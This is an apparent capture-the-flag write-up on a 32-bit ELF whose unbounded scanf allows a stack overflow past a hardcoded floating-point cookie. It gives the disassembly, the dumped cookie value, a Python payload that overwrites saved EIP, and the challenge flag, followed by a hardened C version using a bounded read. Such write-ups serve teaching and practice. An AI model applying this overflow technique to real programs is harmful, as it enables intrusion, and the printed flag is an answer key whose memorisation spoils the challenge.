The given 32-bit ELF reads user input with scanf("%s", &buf), which allows a buffer overflow. Just before returning, it performs a floating point comparison:
.text:08048529 fld ds:floating_num
.text:0804852F fstp [esp+0A0h+check]
.text:08048596 fld [esp+0A0h+check]
.text:0804859D fld ds:floating_num
.text:080485A3 fucomip st, st(1)
.text:080485A5 fstp st
.text:080485A7 jz short ret

The floating point number is a 64-bit value that acts as a cookie. Since this value is hardcoded, just fetch it and use it during the overwrite:
gdb-peda$ x/gx 0x08048690
0x8048690: 0x40501555475a31a5

So construct a payload like the one below to control EIP:
import struct

EIP = 0x41414141  # placeholder: the 32-bit address to return to

payload = b"A" * 128                              # fill the buffer up to the cookie
payload += struct.pack("<Q", 0x40501555475a31a5)  # the 64-bit floating point cookie, kept intact
payload += b"A" * 12                              # padding up to the saved return address
payload += struct.pack("<I", EIP)                 # overwrite the saved EIP

Flag is flag{1_533_y0u_kn0w_y0ur_w4y_4r0und_4_buff3r}
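As an added illustration (not the challenge's code), the same layout in C with the unbounded scanf("%s") replaced by a width-limited read, so the hardcoded cookie and the return address are never reachable from input. The cookie bits are the ones dumped above; BUF_SIZE, the function names and the sample input are assumptions.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define BUF_SIZE 128   /* the 128 bytes of padding seen in the payload above */

/* The 64-bit pattern dumped from 0x08048690, reinterpreted as the double that
   'fld ds:floating_num' loads; it comes out near 64.33. */
double floating_num(void) {
    uint64_t bits = 0x40501555475a31a5ULL;
    double d;
    memcpy(&d, &bits, sizeof d);
    return d;
}

/* C equivalent of the fld/fucomip/jz sequence: 1 if the stored copy still matches. */
int check_cookie(double check) {
    return check == floating_num();
}

/* Hardened shape of the vulnerable function. The original does scanf("%s", &buf),
   which has no width limit, so longer input runs over 'check' and the saved return
   address. "%127s" stops at BUF_SIZE-1 characters and leaves room for the NUL, so
   the locals after buf are never touched. (Exact stack layout is the compiler's
   choice; this only shows the bounded read.) */
int read_bounded(const char *input) {
    double check = floating_num();
    char buf[BUF_SIZE];
    if (sscanf(input, "%127s", buf) != 1)   /* original: scanf("%s", &buf) */
        return 0;
    return check_cookie(check);
}

/* How many characters the bounded read keeps from 'input'. */
size_t bounded_len(const char *input) {
    char buf[BUF_SIZE];
    if (sscanf(input, "%127s", buf) != 1)
        return 0;
    return strlen(buf);
}

/* Constructed sample input: n bytes of 'A' (capped at 299). */
const char *constructed_input(size_t n) {
    static char sample[300];
    if (n > sizeof sample - 1)
        n = sizeof sample - 1;
    memset(sample, 'A', n);
    sample[n] = '\0';
    return sample;
}
```

A 200-byte input that would overrun the original buffer is cut to 127 characters here, and the cookie comparison still passes because nothing past buf was written.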